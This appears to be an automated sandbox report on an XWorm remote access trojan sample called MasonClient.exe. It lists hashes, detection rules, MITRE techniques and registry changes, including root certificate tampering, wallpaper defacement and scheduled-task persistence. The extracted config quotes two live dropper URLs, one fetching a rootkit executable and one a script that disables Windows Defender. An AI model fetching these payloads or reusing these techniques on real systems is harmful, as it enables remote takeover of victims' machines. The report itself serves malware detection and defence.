xworm | b19785992fe57f8f4ab7c7fc7d067a6d3c0832252afc5f13d6e165afefcff90b

Analysis

max time kernel
308s
max time network
467s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05/03/2025, 00:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MasonClient.exe
Size

54KB
MD5

a51b3cb18641d1abd8cc9104e06e09c4
SHA1

2e656f9f2fff61c4e0594a4459fe945c07735bc7
SHA256

b19785992fe57f8f4ab7c7fc7d067a6d3c0832252afc5f13d6e165afefcff90b
SHA512

ae01bc88a59e3b90b0f6d684cbc05b62e57baf3fe68d75d08652e0006adb3d6000939c6e688ce28d4a603afdf1e80b6b1cb3d5e9abaef24938bb8da34a403b76
SSDEEP

768:/IvFRjaxUL8U1Wj0bIKN0l1VzIf823Xocb036rSqyt/X6LGaAhJO0gu3:/I9Rjaxhj8NsfITHHb036Q/pbO0gu3

Score

10^/10

xworm discovery execution ransomware rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 8 IoCs

resource	yara_rule
behavioral1/memory/2364-1-0x0000000000CF0000-0x0000000000D04000-memory.dmp	family_xworm
behavioral1/files/0x0008000000004e74-863.dat	family_xworm
behavioral1/memory/2016-914-0x0000000000080000-0x0000000000094000-memory.dmp	family_xworm
behavioral1/memory/1740-2996-0x0000000000DF0000-0x0000000000E04000-memory.dmp	family_xworm
behavioral1/memory/2684-5395-0x0000000000230000-0x0000000000244000-memory.dmp	family_xworm
behavioral1/memory/1488-6801-0x0000000001250000-0x0000000001264000-memory.dmp	family_xworm
behavioral1/memory/2716-9549-0x0000000000010000-0x0000000000024000-memory.dmp	family_xworm
behavioral1/memory/1740-10316-0x0000000000A40000-0x0000000000A54000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2748	powershell.exe
6	2748	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2748	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2016	MasonClient.exe
1740	MasonClient.exe
2684	MasonClient.exe
1488	MasonClient.exe
1740	MasonClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
118	raw.githubusercontent.com
191	raw.githubusercontent.com
199	raw.githubusercontent.com
238	raw.githubusercontent.com
70	raw.githubusercontent.com
14	raw.githubusercontent.com
83	raw.githubusercontent.com
100	raw.githubusercontent.com
132	raw.githubusercontent.com
140	raw.githubusercontent.com
151	raw.githubusercontent.com
231	raw.githubusercontent.com
88	raw.githubusercontent.com
125	raw.githubusercontent.com
126	raw.githubusercontent.com
143	raw.githubusercontent.com
165	raw.githubusercontent.com
189	raw.githubusercontent.com
205	raw.githubusercontent.com
220	raw.githubusercontent.com
18	raw.githubusercontent.com
73	raw.githubusercontent.com
136	raw.githubusercontent.com
141	raw.githubusercontent.com
154	raw.githubusercontent.com
175	raw.githubusercontent.com
180	raw.githubusercontent.com
212	raw.githubusercontent.com
68	raw.githubusercontent.com
101	raw.githubusercontent.com
115	raw.githubusercontent.com
128	raw.githubusercontent.com
142	raw.githubusercontent.com
162	raw.githubusercontent.com
169	raw.githubusercontent.com
215	raw.githubusercontent.com
46	raw.githubusercontent.com
134	raw.githubusercontent.com
135	raw.githubusercontent.com
185	raw.githubusercontent.com
208	raw.githubusercontent.com
232	raw.githubusercontent.com
234	raw.githubusercontent.com
102	raw.githubusercontent.com
119	raw.githubusercontent.com
124	raw.githubusercontent.com
129	raw.githubusercontent.com
137	raw.githubusercontent.com
196	raw.githubusercontent.com
225	raw.githubusercontent.com
229	raw.githubusercontent.com
120	raw.githubusercontent.com
133	raw.githubusercontent.com
190	raw.githubusercontent.com
223	raw.githubusercontent.com
242	raw.githubusercontent.com
251	raw.githubusercontent.com
71	raw.githubusercontent.com
72	raw.githubusercontent.com
97	raw.githubusercontent.com
114	raw.githubusercontent.com
116	raw.githubusercontent.com
148	raw.githubusercontent.com
167	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img"	MasonClient.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4580d2b51a8b04aae5774640bee6578000000000200000000001066000000010000200000009058db8fa63b4eaa8ba1f14cd2de344cb5c1bed161f525d0bbc0af8334d61735000000000e80000000020000200000004ad2edcc06abe6ca820a68f70c75ce03b6febb5e9f9ccd28e20da035965cf0ba20000000c2fd1f9441587de268f3220fe5c297299ee6827563ae0a992363c48b4625c5fe400000001cadf16c7fa1b0fb6dbc4a0b9db7a95d29214f2e9370a4ca90067c1f4c24ea0a669ec988d573ba417f0cd4d559c76d2f590c1825b563328bc66b3de6acb9c8d5	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7090bd72698ddb01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "447298033"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9E41E9D1-F95C-11EF-846E-46BBF83CD43C} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4580d2b51a8b04aae5774640bee657800000000020000000000106600000001000020000000a2fbd9ab86d3fa2832f55e26d453f515c5bf76400c33a7021a4f3e20cc4ee5ce000000000e8000000002000020000000438f8dc7d5ab7af67c4e4ca1b8933fda0966e73a971640689a771e66ea0b28de90000000a48e062dc42905b87ee3cac85ab2bee44840457c2448cfb3b369d693ac9184023115bb7e81089b00260ff98ee6f63388e4ee705bb60d8d684e98eb1284a132d381f28992824b8cfe03d4cbde245ea1c1cf654121bd889da51016fd72b4bc86efff20f6681e6f8d4dfa1f7ac1e6f8e2f8f619b73d9e449cf9abeb1ca3f5ff9ae906316f5879322c371c019e9f04b041ed4000000054681bf41a1b66d3eb32168fb292fedf48bd7facb04c51fc72c2ed4bb325f0d7a1e180d98b3c18f3190f31e232e787f9f54b502dae5f8db8c9d15e0531c8df1d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe

Modifies system certificate store 2 TTPs 5 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	MasonClient.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	MasonClient.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	MasonClient.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	MasonClient.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	MasonClient.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2744	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2748	powershell.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2364	MasonClient.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeDebugPrivilege	2016	MasonClient.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
2020	iexplore.exe
2364	MasonClient.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2020	iexplore.exe
2020	iexplore.exe
2964	IEXPLORE.EXE
2964	IEXPLORE.EXE
2964	IEXPLORE.EXE
2964	IEXPLORE.EXE
2020	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 2748	2364	MasonClient.exe	30
PID 2364 wrote to memory of 2748	2364	MasonClient.exe	30
PID 2364 wrote to memory of 2748	2364	MasonClient.exe	30
